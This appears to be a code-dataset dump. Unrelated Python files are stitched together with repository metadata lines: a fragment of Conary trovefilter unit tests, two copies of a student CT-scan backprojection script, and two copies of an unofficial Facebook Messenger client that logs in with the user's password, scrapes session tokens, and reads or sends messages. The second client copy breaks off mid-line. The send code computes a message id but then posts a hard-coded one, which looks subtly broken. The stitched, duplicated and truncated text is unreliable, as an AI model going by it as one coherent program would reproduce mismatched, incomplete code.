deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) # test a macro in the version element filt = trovefilter.TroveFilter(recipe, '%(name)s', version = '%(name)s.rpath.local@rpl:linux') nvf = ('foo', versions.VersionFromString( \ '/foo.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) @testhelp.context('trove-filter') def testTroveFilterRegexps(self): recipe = self.getRecipe() recipe.macros.name = 'foo' # test a regexp in the name element filt = trovefilter.TroveFilter(recipe, '%(name)s1+', version = 'test.rpath.local@rpl:linux') nvf = ('foo11', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) # test that name regexp is anchored nvf = ('foo113', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) @testhelp.context('trove-filter') def testTroveFilterFlavors(self): recipe = self.getRecipe() filt = trovefilter.TroveFilter(recipe, flavor = 'xen,domU') filt2 = trovefilter.TroveFilter(recipe, name = 'bar', flavor = 'xen,domU') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) self.assertEquals(filt2.match((nvf,)), False) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: x86')) self.assertEquals(filt.match((nvf,)), True) self.assertEquals(filt2.match((nvf,)), False) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: x86_64')) self.assertEquals(filt.match((nvf,)), True) self.assertEquals(filt2.match((nvf,)), False) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), 'xen,domU is: x86_64') self.assertEquals(filt.match((nvf,)), True) self.assertEquals(filt2.match((nvf,)), False) @testhelp.context('trove-filter') def testTroveFilterFlavors2(self): recipe = self.getRecipe() filt1 = trovefilter.TroveFilter(recipe, flavor = 'xen,domU is: x86') filt2 = trovefilter.TroveFilter(recipe, flavor = 'xen,domU is: x86_64') filt3 = trovefilter.TroveFilter(recipe, flavor = 'xen,domU is: x86_64 x86') nvf1 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('is: x86')) nvf2 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: x86')) nvf3 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: x86_64')) nvf4 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: x86 x86_64')) self.assertEquals(filt1.match((nvf1,)), False) self.assertEquals(filt1.match((nvf2,)), True) self.assertEquals(filt2.match((nvf2,)), False) self.assertEquals(filt2.match((nvf3,)), True) self.assertEquals(filt2.match((nvf4,)), False) self.assertEquals(filt3.match((nvf4,)), True) self.assertEquals(filt3.match((nvf1,)), False) self.assertEquals(filt3.match((nvf2,)), False) self.assertEquals(filt3.match((nvf3,)), False) @testhelp.context('trove-filter') def testTroveFilterFlavors3(self): recipe = self.getRecipe() filt1 = trovefilter.TroveFilter(recipe, flavor = 'xen,domU is: x86') filt2 = trovefilter.TroveFilter(recipe, flavor = 'xen,domU is: x86(sse, sse2, 486, 586, 686)') nvf1 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: x86')) nvf2 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: x86(sse, sse2, 486, 586, 686)')) self.assertEquals(filt1.match((nvf1,)), True) self.assertEquals(filt2.match((nvf2,)), True) # most important test. x86 filter matches x86(sse) self.assertEquals(filt1.match((nvf2,)), True) self.assertEquals(filt2.match((nvf1,)), False) @testhelp.context('trove-filter') def testTroveFilterFlavors4(self): recipe = self.getRecipe() filt1 = trovefilter.TroveFilter(recipe, flavor = 'xen,domU is: sparc') filt2 = trovefilter.TroveFilter(recipe, flavor = 'xen,domU is: x86(sse, sse2, 486, 586, 686)') filt3 = trovefilter.TroveFilter(recipe, flavor = 'xen,domU') nvf1 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: sparc')) nvf2 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('xen,domU is: x86(sse, sse2, 486, 586, 686)')) self.assertEquals(filt1.match((nvf1,)), True) self.assertEquals(filt2.match((nvf2,)), True) self.assertEquals(filt1.match((nvf2,)), False) self.assertEquals(filt2.match((nvf1,)), False) self.assertEquals(filt3.match((nvf1,)), True) @testhelp.context('trove-filter') def testTroveFilterNoVersion(self): recipe = self.getRecipe() filt = trovefilter.TroveFilter(recipe, name = 'foo') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:devel/1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) @testhelp.context('trove-filter') def testTroveFilterRevision(self): recipe = self.getRecipe() filt = trovefilter.TroveFilter(recipe, version = '1.1-1-1') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-2'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) filt = trovefilter.TroveFilter(recipe, version = '1.1-1') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-1-2'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-2'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.2-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) filt = trovefilter.TroveFilter(recipe, version = '1.1') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-1-2'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.2-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) filt = trovefilter.TroveFilter(recipe, version = '') self.assertEquals(filt.match((nvf,)), True) @testhelp.context('trove-filter') def testTroveFilterBlank(self): recipe = self.getRecipe() filt = trovefilter.TroveFilter(recipe) nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) nvf = ('bar', versions.VersionFromString( \ '/test.rpath.local@rpl:devel/1.0-6-4'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) @testhelp.context('trove-filter') def testTroveFilterNot(self): recipe = self.getRecipe() filt = -trovefilter.TroveFilter(recipe, name = 'foo') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) nvf = ('bar', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) filt = ~trovefilter.TroveFilter(recipe, name = 'foo') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) nvf = ('bar', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) @testhelp.context('trove-filter') def testTroveFilterOr(self): recipe = self.getRecipe() filt1 = trovefilter.TroveFilter(recipe, name = 'foo') filt2 = trovefilter.TroveFilter(recipe, name = 'group-foo') filt3 = filt1 - filt2 filt4 = filt1 + - filt2 filt5 = filt2 - filt1 filt6 = filt2 | filt1 nvf1 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) nvf2 = ('group-foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) self.assertEquals(filt3.match((nvf1, nvf2)), True) self.assertEquals(filt3.match((nvf2,)), False) self.assertEquals(filt4.match((nvf1, nvf2)), True) self.assertEquals(filt5.match((nvf1, nvf2)), True) self.assertEquals(filt5.match((nvf1,)), False) self.assertEquals(filt6.match((nvf1, nvf2)), True) @testhelp.context('trove-filter') def testTroveFilterAnd(self): recipe = self.getRecipe() filt1 = trovefilter.TroveFilter(recipe, name = 'foo') filt2 = trovefilter.TroveFilter(recipe, name = 'group-foo') filt3 = filt1 * -filt2 filt4 = filt2 * -filt1 filt5 = filt2 & filt1 filt6 = filt2 & ~filt1 nvf1 = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) nvf2 = ('group-foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1.1-2-1'), deps.parseFlavor('')) self.assertEquals(filt3.match((nvf1, nvf2)), False) self.assertEquals(filt3.match((nvf2,)), False) self.assertEquals(filt3.match((nvf1,)), True) self.assertEquals(filt4.match((nvf1, nvf2)), False) self.assertEquals(filt4.match((nvf1,)), False) self.assertEquals(filt4.match((nvf2,)), True) self.assertEquals(filt5.match((nvf1, nvf2)), True) self.assertEquals(filt5.match((nvf1,)), False) self.assertEquals(filt5.match((nvf2,)), False) self.assertEquals(filt6.match((nvf1, nvf2)), False) @testhelp.context('trove-filter') def testTroveFilterEquality(self): recipe = self.getRecipe() filt1 = trovefilter.TroveFilter(recipe, name = 'foo') filt2 = trovefilter.TroveFilter(recipe, name = 'group-foo') self.assertNotEquals(filt1, filt2) filt1 = trovefilter.TroveFilter(recipe, name = 'foo') filt2 = trovefilter.TroveFilter(recipe, name = 'foo') self.assertEquals(filt1, filt2) filt1 = trovefilter.TroveFilter(recipe, name = 'foo', version = 'c.r.c@rpl:linux') filt2 = trovefilter.TroveFilter(recipe, name = 'foo') self.assertNotEquals(filt1, filt2) filt1 = trovefilter.TroveFilter(recipe, name = 'foo', version = 'c.r.c@rpl:linux') filt2 = trovefilter.TroveFilter(recipe, name = 'foo', version = 'c.r.c@rpl:linux') self.assertEquals(filt1, filt2) filt1 = trovefilter.TroveFilter(recipe, name = 'foo', version = 'c.r.c@rpl:linux') filt2 = trovefilter.TroveFilter(recipe, name = 'foo', version = '/c.r.c@rpl:linux') self.assertNotEquals(filt1, filt2) filt1 = trovefilter.TroveFilter(recipe, name = 'foo', version = 'c.r.c@rpl:linux', flavor = 'is: x86') filt2 = trovefilter.TroveFilter(recipe, name = 'foo', version = 'c.r.c@rpl:linux') self.assertNotEquals(filt1, filt2) filt1 = trovefilter.TroveFilter(recipe, name = 'foo', flavor = 'is: x86') filt2 = trovefilter.TroveFilter(recipe, name = 'foo', flavor = 'is: x86 x86_64') self.assertNotEquals(filt1, filt2) filt1 = trovefilter.TroveFilter(recipe, name = 'foo', version = 'c.r.c@rpl:linux', flavor = 'is: x86') filt2 = trovefilter.TroveFilter(recipe, name = 'foo', version = 'c.r.c@rpl:linux', flavor = 'is: x86') self.assertEquals(filt1, filt2)
22,321
1,149
369
be31d4bb7630a7fc2c1993bb09d802aee8af78d3
6,647
py
Python
Project/RE4017_proj1.py
Ciaran-Carroll/college
46052aa177280f7900e04e0e828247d7097eb07b
[ "MIT" ]
null
null
null
Project/RE4017_proj1.py
Ciaran-Carroll/college
46052aa177280f7900e04e0e828247d7097eb07b
[ "MIT" ]
null
null
null
Project/RE4017_proj1.py
Ciaran-Carroll/college
46052aa177280f7900e04e0e828247d7097eb07b
[ "MIT" ]
null
null
null
''' #Students Name's: Ciaran Carroll # Student Id Number's: 13113259 # # Project 1: # Implement image reconstruction from parallel-projection sinograms using Python. # # CAT Scanners (or CT scan) - Computer Axial Tomography # CT scan: is a special X-ray tests that produce cross-sectional images of the body using X-rays and # a computer # FFTs - Fast Fourieris Transform # FFT: is an algorithm that samples a signal over a period of time (or space) and divides it # into its frequency components # Laminogram: Reconstruct the sum of the backprojections (i.e. sum of the f(x,y)) # Coplanar rotational laminography (CRL) is a special case of laminography which is a # tomographic technique used to image cross-sectional views through solid objects. # # Aim: # (1) Reconstruct an image from the sinogram image (sinogram.png) # (2) Investigate the behaviour of backprojection reconstruction with ramp-filtering # (3) Investigate the behaviour of backprojection reconstruction without ramp-filtering # (4) Investigate the behaviour of backprojection reconstruction with Hamming-windowed ramp-filtering # # A display of all the projections for all X-ray angles is called a Sinogram # # Rebuild the image from a sum of the 'Backprojections' of the 1-d projection data Step 1 - Backprojection reconstruction of the sinogram without filtering: When all the projection angles are combined the projection, the resulting image will be blurred. This is due to the fact that the resulting image is concentrated towards the center. (concentrated samples of the image towards the center, and more sparse samples near the edges). To compensate for this we will need to apply a filter to the output image of the backprojection such as the ramp filter or the Hamming-windowed ramp-filter New Steps (1) - Form the image projections and translate into the frequency domain using the FFT ''' import numpy as np import matplotlib.pylab as plt from PIL import Image from scipy.ndimage.filters import gaussian_filter from skimage.transform import rotate import scipy.fftpack as fft #from skimage.transform import iradon def imread(filename,greyscale=True): """Load an image, return as a Numpy array.""" if greyscale: pil_im = Image.open(filename).convert('L') else: pil_im = Image.open(filename) return np.array(pil_im) def imshow(im, autoscale=False,colourmap='gray', newfig=True, title=None): """Display an image, turning off autoscaling (unless explicitly required) and interpolation. (1) 8-bit greyscale images and 24-bit RGB are scaled in 0..255. (2) 0-1 binary images are scaled in 0..1. (3) Float images are scaled in 0.0..1.0 if their min values are >= 0 and their max values <= 1.0 (4) Float images are scaled in 0.0..255.0 if their min values are >= 0 and their max values are > 1 and <= 255.0 (5) Any image not covered by the above cases is autoscaled. If autoscaling is explicitly requested, it is always turned on. A new figure is created by default. "newfig=False" turns off this behaviour. Interpolation is always off (unless the backend stops this). """ if newfig: if title != None: fig = plt.figure(title) else: fig = plt.figure() if autoscale: plt.imshow(im,interpolation='nearest',cmap=colourmap) else: maxval = im.max() if im.dtype == 'uint8': ## 8-bit greyscale or 24-bit RGB if maxval > 1: maxval = 255 plt.imshow(im,interpolation='nearest',vmin=0,vmax=maxval,cmap=colourmap) elif im.dtype == 'float32' or im.dtype == 'float64': minval = im.min() if minval >= 0.0: if maxval <= 1.0: ## Looks like 0..1 float greyscale minval, maxval = 0.0, 1.0 elif maxval <= 255.0: ## Looks like a float 0 .. 255 image. minval, maxval = 0.0, 255.0 plt.imshow(im,interpolation='nearest',vmin=minval,vmax=maxval,cmap=colourmap) else: plt.imshow(im,interpolation='nearest',cmap=colourmap) plt.axis('image') ## plt.axis('off') plt.show() ##return fig def build_proj_ffts(projs): "Build 1-d FFTs of an array of projections, each projection 1 row fo the array." return fft.rfft(projs, axis=1) def build_proj_iffts(projs): "Build 1-d iFFTs of an array of projections, each projection 1 row fo the array." return fft.irfft(projs, axis=1) def build_laminogram(radonT): "Generate a laminogram by simple backprojection using the Radon Transform of an image, 'radonT'." laminogram = np.zeros((radonT.shape[1],radonT.shape[1])) dTheta = 180.0 / radonT.shape[0] for i in range(radonT.shape[0]): temp = np.tile(radonT[i],(radonT.shape[1],1)) temp = rotate(temp, dTheta*i) laminogram += temp return laminogram def ramp_filter_ffts(ffts): "Ramp filter a 2-d array of 1-d FFTs (1-d FFTs along the rows)." ramp = np.floor(np.arange(0.5, ffts.shape[1]//2 + 0.1, 0.5)) return ffts * ramp def radon(image, steps): "Build the Radon Transform using 'steps' projections of 'image’." projections = [] # Accumulate projections in a list. dTheta = -180.0 / steps # Angle increment for rotations. for i in range(steps): projections.append(rotate(image, i*dTheta).sum(axis=0)) return np.vstack(projections) # Original Sinogram Image sinogram = imread('sinogram.png') imshow(sinogram, title="Original Sinogram Image") # Backprojection reconstruction without ramp filtering sinogram_laminogram = build_laminogram(sinogram) imshow(sinogram_laminogram, title="Sinogram reconstruction by backprojection") # Backprojection reconstruction with ramp filtering # Apply an infinite ramp filter to the reconstruction # Maybe apply a ramp filter with a cutoff at half the max frwquency # But most likely no point # Get the FFT of the image (Frequency Domain) fourier = build_proj_ffts(sinogram) # Filter the fourier transform by the ramp filter ramp_filtered = ramp_filter_ffts(fourier) # Take the inverse FFT of the image to convert it back to Special Domain inverse_fourier_ramp_filtered = build_proj_iffts(ramp_filtered) #imshow(iffts_projection_sinogram, title="Test ramp filter") #test1 = radon(iffts_projection_sinogram, 180) #imshow(test1, title="Test ramp filter") # Build the filtered image by pbackprojecting the filtered projections filtered_reconstrution = build_laminogram(inverse_fourier_ramp_filtered) imshow(filtered_reconstrution, title="Test ramp filter")
38.871345
101
0.70844
''' #Students Name's: Ciaran Carroll # Student Id Number's: 13113259 # # Project 1: # Implement image reconstruction from parallel-projection sinograms using Python. # # CAT Scanners (or CT scan) - Computer Axial Tomography # CT scan: is a special X-ray tests that produce cross-sectional images of the body using X-rays and # a computer # FFTs - Fast Fourieris Transform # FFT: is an algorithm that samples a signal over a period of time (or space) and divides it # into its frequency components # Laminogram: Reconstruct the sum of the backprojections (i.e. sum of the f(x,y)) # Coplanar rotational laminography (CRL) is a special case of laminography which is a # tomographic technique used to image cross-sectional views through solid objects. # # Aim: # (1) Reconstruct an image from the sinogram image (sinogram.png) # (2) Investigate the behaviour of backprojection reconstruction with ramp-filtering # (3) Investigate the behaviour of backprojection reconstruction without ramp-filtering # (4) Investigate the behaviour of backprojection reconstruction with Hamming-windowed ramp-filtering # # A display of all the projections for all X-ray angles is called a Sinogram # # Rebuild the image from a sum of the 'Backprojections' of the 1-d projection data Step 1 - Backprojection reconstruction of the sinogram without filtering: When all the projection angles are combined the projection, the resulting image will be blurred. This is due to the fact that the resulting image is concentrated towards the center. (concentrated samples of the image towards the center, and more sparse samples near the edges). To compensate for this we will need to apply a filter to the output image of the backprojection such as the ramp filter or the Hamming-windowed ramp-filter New Steps (1) - Form the image projections and translate into the frequency domain using the FFT ''' import numpy as np import matplotlib.pylab as plt from PIL import Image from scipy.ndimage.filters import gaussian_filter from skimage.transform import rotate import scipy.fftpack as fft #from skimage.transform import iradon def imread(filename,greyscale=True): """Load an image, return as a Numpy array.""" if greyscale: pil_im = Image.open(filename).convert('L') else: pil_im = Image.open(filename) return np.array(pil_im) def imshow(im, autoscale=False,colourmap='gray', newfig=True, title=None): """Display an image, turning off autoscaling (unless explicitly required) and interpolation. (1) 8-bit greyscale images and 24-bit RGB are scaled in 0..255. (2) 0-1 binary images are scaled in 0..1. (3) Float images are scaled in 0.0..1.0 if their min values are >= 0 and their max values <= 1.0 (4) Float images are scaled in 0.0..255.0 if their min values are >= 0 and their max values are > 1 and <= 255.0 (5) Any image not covered by the above cases is autoscaled. If autoscaling is explicitly requested, it is always turned on. A new figure is created by default. "newfig=False" turns off this behaviour. Interpolation is always off (unless the backend stops this). """ if newfig: if title != None: fig = plt.figure(title) else: fig = plt.figure() if autoscale: plt.imshow(im,interpolation='nearest',cmap=colourmap) else: maxval = im.max() if im.dtype == 'uint8': ## 8-bit greyscale or 24-bit RGB if maxval > 1: maxval = 255 plt.imshow(im,interpolation='nearest',vmin=0,vmax=maxval,cmap=colourmap) elif im.dtype == 'float32' or im.dtype == 'float64': minval = im.min() if minval >= 0.0: if maxval <= 1.0: ## Looks like 0..1 float greyscale minval, maxval = 0.0, 1.0 elif maxval <= 255.0: ## Looks like a float 0 .. 255 image. minval, maxval = 0.0, 255.0 plt.imshow(im,interpolation='nearest',vmin=minval,vmax=maxval,cmap=colourmap) else: plt.imshow(im,interpolation='nearest',cmap=colourmap) plt.axis('image') ## plt.axis('off') plt.show() ##return fig def build_proj_ffts(projs): "Build 1-d FFTs of an array of projections, each projection 1 row fo the array." return fft.rfft(projs, axis=1) def build_proj_iffts(projs): "Build 1-d iFFTs of an array of projections, each projection 1 row fo the array." return fft.irfft(projs, axis=1) def build_laminogram(radonT): "Generate a laminogram by simple backprojection using the Radon Transform of an image, 'radonT'." laminogram = np.zeros((radonT.shape[1],radonT.shape[1])) dTheta = 180.0 / radonT.shape[0] for i in range(radonT.shape[0]): temp = np.tile(radonT[i],(radonT.shape[1],1)) temp = rotate(temp, dTheta*i) laminogram += temp return laminogram def ramp_filter_ffts(ffts): "Ramp filter a 2-d array of 1-d FFTs (1-d FFTs along the rows)." ramp = np.floor(np.arange(0.5, ffts.shape[1]//2 + 0.1, 0.5)) return ffts * ramp def radon(image, steps): "Build the Radon Transform using 'steps' projections of 'image’." projections = [] # Accumulate projections in a list. dTheta = -180.0 / steps # Angle increment for rotations. for i in range(steps): projections.append(rotate(image, i*dTheta).sum(axis=0)) return np.vstack(projections) # Original Sinogram Image sinogram = imread('sinogram.png') imshow(sinogram, title="Original Sinogram Image") # Backprojection reconstruction without ramp filtering sinogram_laminogram = build_laminogram(sinogram) imshow(sinogram_laminogram, title="Sinogram reconstruction by backprojection") # Backprojection reconstruction with ramp filtering # Apply an infinite ramp filter to the reconstruction # Maybe apply a ramp filter with a cutoff at half the max frwquency # But most likely no point # Get the FFT of the image (Frequency Domain) fourier = build_proj_ffts(sinogram) # Filter the fourier transform by the ramp filter ramp_filtered = ramp_filter_ffts(fourier) # Take the inverse FFT of the image to convert it back to Special Domain inverse_fourier_ramp_filtered = build_proj_iffts(ramp_filtered) #imshow(iffts_projection_sinogram, title="Test ramp filter") #test1 = radon(iffts_projection_sinogram, 180) #imshow(test1, title="Test ramp filter") # Build the filtered image by pbackprojecting the filtered projections filtered_reconstrution = build_laminogram(inverse_fourier_ramp_filtered) imshow(filtered_reconstrution, title="Test ramp filter")
0
0
0
16ed837df429a96c0cdbd562240040a729a666ee
7,343
py
Python
messyger.py
raxod502/messyger
fbfe286d2448bc8ec112e7f3063f71dfe3bf2c27
[ "MIT" ]
4
2021-12-06T17:06:20.000Z
2022-02-24T21:10:02.000Z
messyger.py
raxod502/messyger
fbfe286d2448bc8ec112e7f3063f71dfe3bf2c27
[ "MIT" ]
null
null
null
messyger.py
raxod502/messyger
fbfe286d2448bc8ec112e7f3063f71dfe3bf2c27
[ "MIT" ]
null
null
null
import argparse import collections import datetime import json import random import re import esprima import requests ## Get the email and password parser = argparse.ArgumentParser("messyger") parser.add_argument("-u", "--email", required=True) parser.add_argument("-p", "--password", required=True) parser.add_argument("-m", "--message") parser.add_argument("-r", "--recipient", type=int) args = parser.parse_args() ## Parse the HTML response html_resp = requests.get("https://www.messenger.com") html_resp.raise_for_status() html_page = html_resp.text initial_request_id = re.search( r'name="initial_request_id" value="([^"]+)"', html_page ).group(1) lsd = re.search(r'name="lsd" value="([^"]+)"', html_page).group(1) datr = re.search(r'"_js_datr","([^"]+)"', html_page).group(1) ## Make the login request login = requests.post( "https://www.messenger.com/login/password/", cookies={"datr": datr}, data={ "lsd": lsd, "initial_request_id": initial_request_id, "email": args.email, "pass": args.password, }, allow_redirects=False, ) assert login.status_code == 302 ## Extract the inbox query parameters inbox_html_resp = requests.get("https://www.messenger.com", cookies=login.cookies) inbox_html_resp.raise_for_status() inbox_html_page = inbox_html_resp.text dtsg = re.search(r'"DTSGInitialData",\[\],\{"token":"([^"]+)"', inbox_html_page).group( 1 ) device_id = re.search(r'"deviceId":"([^"]+)"', inbox_html_page).group(1) schema_version = re.search(r'"schemaVersion":"([0-9]+)"', inbox_html_page).group(1) script_urls = re.findall(r'"([^"]+rsrc\.php/[^"]+\.js[^"]+)"', inbox_html_page) scripts = [] for url in script_urls: resp = requests.get(url) resp.raise_for_status() scripts.append(resp.text) for script in scripts: if "LSPlatformGraphQLLightspeedRequestQuery" not in script: continue doc_id = re.search( r'id:"([0-9]+)",metadata:\{\},name:"LSPlatformGraphQLLightspeedRequestQuery"', script, ).group(1) break if not args.message: inbox_resp = requests.post( "https://www.messenger.com/api/graphql/", cookies=login.cookies, data={ "fb_dtsg": dtsg, "doc_id": doc_id, "variables": json.dumps( { "deviceId": device_id, "requestId": 0, "requestPayload": json.dumps( { "database": 1, "version": schema_version, "sync_params": json.dumps({}), } ), "requestType": 1, } ), }, ) inbox_resp.raise_for_status() ## Parse the inbox data response inbox_json = inbox_resp.json() inbox_js = inbox_json["data"]["viewer"]["lightspeed_web_request"]["payload"] ast = esprima.parseScript(inbox_js) fn_calls = collections.defaultdict(list) esprima.parseScript(inbox_js, delegate=handle_node) conversations = collections.defaultdict(dict) for args in fn_calls["deleteThenInsertThread"]: last_sent_ts, last_read_ts, last_msg, *rest = args user_id, last_msg_author = [ arg for arg in rest if isinstance(arg, int) and arg > 1e14 ] conversations[user_id]["unread"] = last_sent_ts != last_read_ts conversations[user_id]["last_message"] = last_msg conversations[user_id]["last_message_author"] = last_msg_author for args in fn_calls["verifyContactRowExists"]: user_id, _, _, name, *rest = args conversations[user_id]["name"] = name print(json.dumps(conversations, indent=2)) else: ## Replicate the send-message request timestamp = int(datetime.datetime.now().timestamp() * 1000) epoch = timestamp << 22 otid = epoch + random.randrange(2 ** 22) send_message_resp = requests.post( "https://www.messenger.com/api/graphql/", cookies=login.cookies, data={ "fb_dtsg": dtsg, "doc_id": doc_id, "variables": json.dumps( { "deviceId": device_id, "requestId": 0, "requestPayload": json.dumps( { "version_id": str(schema_version), "tasks": [ { "label": "46", "payload": json.dumps( { "thread_id": args.recipient, "otid": "6870463702739115830", "source": 0, "send_type": 1, "text": args.message, "initiating_source": 1, } ), "queue_name": str(args.recipient), "task_id": 0, "failure_count": None, }, { "label": "21", "payload": json.dumps( { "thread_id": args.recipient, "last_read_watermark_ts": timestamp, "sync_group": 1, } ), "queue_name": str(args.recipient), "task_id": 1, "failure_count": None, }, ], "epoch_id": 6870463702858032000, } ), "requestType": 3, } ), }, ) print(send_message_resp.text)
32.635556
87
0.493395
import argparse import collections import datetime import json import random import re import esprima import requests ## Get the email and password parser = argparse.ArgumentParser("messyger") parser.add_argument("-u", "--email", required=True) parser.add_argument("-p", "--password", required=True) parser.add_argument("-m", "--message") parser.add_argument("-r", "--recipient", type=int) args = parser.parse_args() ## Parse the HTML response html_resp = requests.get("https://www.messenger.com") html_resp.raise_for_status() html_page = html_resp.text initial_request_id = re.search( r'name="initial_request_id" value="([^"]+)"', html_page ).group(1) lsd = re.search(r'name="lsd" value="([^"]+)"', html_page).group(1) datr = re.search(r'"_js_datr","([^"]+)"', html_page).group(1) ## Make the login request login = requests.post( "https://www.messenger.com/login/password/", cookies={"datr": datr}, data={ "lsd": lsd, "initial_request_id": initial_request_id, "email": args.email, "pass": args.password, }, allow_redirects=False, ) assert login.status_code == 302 ## Extract the inbox query parameters inbox_html_resp = requests.get("https://www.messenger.com", cookies=login.cookies) inbox_html_resp.raise_for_status() inbox_html_page = inbox_html_resp.text dtsg = re.search(r'"DTSGInitialData",\[\],\{"token":"([^"]+)"', inbox_html_page).group( 1 ) device_id = re.search(r'"deviceId":"([^"]+)"', inbox_html_page).group(1) schema_version = re.search(r'"schemaVersion":"([0-9]+)"', inbox_html_page).group(1) script_urls = re.findall(r'"([^"]+rsrc\.php/[^"]+\.js[^"]+)"', inbox_html_page) scripts = [] for url in script_urls: resp = requests.get(url) resp.raise_for_status() scripts.append(resp.text) for script in scripts: if "LSPlatformGraphQLLightspeedRequestQuery" not in script: continue doc_id = re.search( r'id:"([0-9]+)",metadata:\{\},name:"LSPlatformGraphQLLightspeedRequestQuery"', script, ).group(1) break if not args.message: inbox_resp = requests.post( "https://www.messenger.com/api/graphql/", cookies=login.cookies, data={ "fb_dtsg": dtsg, "doc_id": doc_id, "variables": json.dumps( { "deviceId": device_id, "requestId": 0, "requestPayload": json.dumps( { "database": 1, "version": schema_version, "sync_params": json.dumps({}), } ), "requestType": 1, } ), }, ) inbox_resp.raise_for_status() ## Parse the inbox data response inbox_json = inbox_resp.json() inbox_js = inbox_json["data"]["viewer"]["lightspeed_web_request"]["payload"] ast = esprima.parseScript(inbox_js) def is_lightspeed_call(node): return ( node.type == "CallExpression" and node.callee.type == "MemberExpression" and node.callee.object.type == "Identifier" and node.callee.object.name == "LS" and node.callee.property.type == "Identifier" and node.callee.property.name == "sp" ) def parse_argument(node): if node.type == "Literal": return node.value if node.type == "ArrayExpression": assert len(node.elements) == 2 high_bits, low_bits = map(parse_argument, node.elements) return (high_bits << 32) + low_bits if node.type == "UnaryExpression" and node.prefix and node.operator == "-": return -parse_argument(node.argument) fn_calls = collections.defaultdict(list) def handle_node(node, meta): if not is_lightspeed_call(node): return args = [parse_argument(arg) for arg in node.arguments] (fn_name, *fn_args) = args fn_calls[fn_name].append(fn_args) esprima.parseScript(inbox_js, delegate=handle_node) conversations = collections.defaultdict(dict) for args in fn_calls["deleteThenInsertThread"]: last_sent_ts, last_read_ts, last_msg, *rest = args user_id, last_msg_author = [ arg for arg in rest if isinstance(arg, int) and arg > 1e14 ] conversations[user_id]["unread"] = last_sent_ts != last_read_ts conversations[user_id]["last_message"] = last_msg conversations[user_id]["last_message_author"] = last_msg_author for args in fn_calls["verifyContactRowExists"]: user_id, _, _, name, *rest = args conversations[user_id]["name"] = name print(json.dumps(conversations, indent=2)) else: ## 